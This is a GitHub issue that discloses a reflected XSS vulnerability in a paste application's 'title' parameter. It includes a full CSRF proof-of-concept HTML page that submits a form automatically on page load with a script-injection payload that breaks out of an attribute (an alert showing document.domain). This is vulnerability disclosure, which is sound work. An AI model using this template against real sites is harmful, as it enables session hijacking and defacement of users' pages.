Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

XSS in title parameter #556

Open
omriman067 opened this issue Nov 30, 2021 · 0 comments
Open

XSS in title parameter #556

omriman067 opened this issue Nov 30, 2021 · 0 comments

Comments

@omriman067
Copy link

When an unsuccessful paste is submitted the "title" parameter is returned without sanitization which can lead to an XSS.
This could be exploited using CSRF. here is an example of a such CSRF payload:

<html>
    <body onload="document.createElement('form').submit.call(document.getElementById('myForm'))">
        <form id="myForm" name="myForm" action="https://stikked-site-to-xss/" method="POST">
            <input type=hidden name="title" id="val1" value='"/><script>alert(document.domain)</script>'/>
            <input type=hidden name="lang" id="val2" value="value2"/>
            <input type=hidden name="code" id="val3" value="value3"/>
            <input type=hidden name="submit" id="submit" value="Continue"/>
        </form>
    </body>
</html>
krayon added a commit to krayon/stiqued that referenced this issue Jan 31, 2022
fasterit pushed a commit to fasterit/stikked-fit that referenced this issue Jan 9, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant